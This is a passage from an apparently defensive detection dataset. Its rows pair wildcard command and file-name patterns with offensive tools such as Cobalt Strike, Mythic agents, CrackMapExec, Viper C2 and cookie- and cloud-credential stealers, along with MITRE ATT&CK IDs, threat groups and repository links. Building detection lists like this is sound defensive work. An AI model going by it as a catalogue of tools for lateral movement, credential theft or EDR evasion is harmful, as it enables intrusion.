The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*Exec-Command-Silent.vbs*,offensive_tool_keyword,wmiexec-pro,The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement,T1021.006 - T1560.001,TA0008 - TA0040,N/A,N/A,Network Exploitation tools,https://github.com/XiaoliChan/wmiexec-Pro,1,1,N/A,N/A,8,790,98,2023-07-31T03:58:14Z,2023-04-04T06:24:07Z -*--exec-method smbexec*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*execmethod*PowerPick*,offensive_tool_keyword,cobaltstrike,PowerView menu for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/aggressor-powerview,1,1,N/A,10,10,60,17,2018-03-22T00:21:57Z,2018-03-22T00:21:13Z -*execmethod*PowerShell*,offensive_tool_keyword,cobaltstrike,PowerView menu for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - 
T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/aggressor-powerview,1,1,N/A,10,10,60,17,2018-03-22T00:21:57Z,2018-03-22T00:21:13Z -*execPayloads.txt*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,1,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z -*Executable_Files-main.zip*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,1,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*execute_assembly -Assembly *,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,0,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*execute_assembly 
SharpCloud*,offensive_tool_keyword,SharpCloud,Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.,T1083 - T1059.001 - T1114.002,TA0007 - TA0002 ,N/A,N/A,Credential Access,https://github.com/chrismaddalena/SharpCloud,1,1,N/A,10,2,154,27,2018-09-18T02:24:10Z,2018-08-20T15:06:22Z -*execute_bof *,offensive_tool_keyword,cobaltstrike,InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/anthemtotheego/InlineExecute-Assembly,1,0,N/A,10,10,490,114,2023-07-22T23:25:15Z,2021-07-08T17:40:07Z -*execute_dotnet_assembly.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*execute_pe -PE*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,0,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*execute_Pezor*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,1,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -*execute_shellcode *,offensive_tool_keyword,DNS-Persist,DNS-Persist is a post-exploitation agent which uses DNS for command and control.,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/0x09AL/DNS-Persist,1,0,N/A,10,10,211,75,2017-11-20T08:53:25Z,2017-11-10T15:23:49Z -*Execute-ACLight.bat*,offensive_tool_keyword,ACLight,A tool for advanced discovery of Privileged Accounts - including Shadow Admins.,T1087 - T1003 - T1208,TA0001 - TA0006 - TA0008,N/A,N/A,AD Enumeration,https://github.com/cyberark/ACLight,1,1,N/A,7,8,730,150,2019-09-09T06:48:45Z,2017-05-17T09:29:41Z -*Execute-ACLight2.bat*,offensive_tool_keyword,ACLight,A tool for advanced discovery of Privileged Accounts - including Shadow Admins.,T1087 - T1003 - T1208,TA0001 - TA0006 - TA0008,N/A,N/A,AD Enumeration,https://github.com/cyberark/ACLight,1,1,N/A,7,8,730,150,2019-09-09T06:48:45Z,2017-05-17T09:29:41Z -*execute-assembly *,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,0,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*execute-assembly *.exe *,offensive_tool_keyword,cobaltstrike,Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 
- T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas,1,0,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -*execute-assembly *asreproast*,offensive_tool_keyword,conti,Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040,Conti Ransomware,Wizard Spider,Ransomware,https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*execute-assembly *kerberoast*,offensive_tool_keyword,conti,Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. 
As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040,Conti Ransomware,Wizard Spider,Ransomware,https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*execute-assembly SharpBlock*,offensive_tool_keyword,SharpBlock,A method of bypassing EDR active projection DLL by preventing entry point exection,T1070.004 - T1055.001 - T1562.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/CCob/SharpBlock,1,0,N/A,10,10,975,147,2021-03-31T09:44:48Z,2020-06-14T10:32:16Z -*execute-assembly*Seatbelt*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*execute-assembly*sharpcookiemonster*,offensive_tool_keyword,SharpCookieMonster,This C# project will dump cookies for all sites. even those with httpOnly/secure/session,T1539 - T1606,TA0008 - TA0002,N/A,N/A,Exploitation tools,https://github.com/m0rv4i/SharpCookieMonster,1,1,N/A,N/A,2,184,41,2023-03-15T09:51:09Z,2020-01-22T18:39:49Z -*execute-assembly*sigflip*,offensive_tool_keyword,C2 related tools,SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/med0x2e/SigFlip,1,1,N/A,10,10,884,165,2023-08-27T18:27:50Z,2021-08-08T15:59:19Z -*ExecuteAssembly.*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,1,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*executeAssembly.nim*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*execute-assembly.py*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*Execute-Command-MSSQL*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Execute-DNSTXT-Code*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*execute-dotnet-assembly*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*execute-pe.py*,offensive_tool_keyword,mythic,Cross-platform post-exploitation HTTP Command & Control agent written in golang,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/merlin,1,1,N/A,10,10,57,10,2023-08-11T15:02:23Z,2021-01-25T12:36:46Z -*executepersistence*,offensive_tool_keyword,cobaltstrike,Cobalt Strike kit for Persistence,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/0xthirteen/StayKit,1,1,N/A,10,10,448,81,2020-01-27T14:53:31Z,2020-01-24T22:20:20Z 
-*execute-Pezor*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,1,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -*execute-shellcode.py*,offensive_tool_keyword,mythic,Cross-platform post-exploitation HTTP Command & Control agent written in golang,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/merlin,1,1,N/A,10,10,57,10,2023-08-11T15:02:23Z,2021-01-25T12:36:46Z -*Execution_CommandAndScriptingInterpreter_UploadAndExec.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 
- T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Execution_UserExecution_CallbackCreateThreadpoolWait.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Execution_UserExecution_CallbackCreateTimerQueue.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Execution_UserExecution_CallbackEnumChildWindows.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z 
-*Execution_UserExecution_CallbackEnumWindows.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Execution_UserExecution_DirectConnectReverseHTTPS.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Execution_UserExecution_DirectConnectReverseTCPRc4.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Execution_UserExecution_FakePPID.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet 
penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Execution_UserExecution_LinuxBaseShellcodeLoader.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Execution_UserExecution_LinuxSelfGuardLoader.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Execution_UserExecution_NtCreateSection.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - 
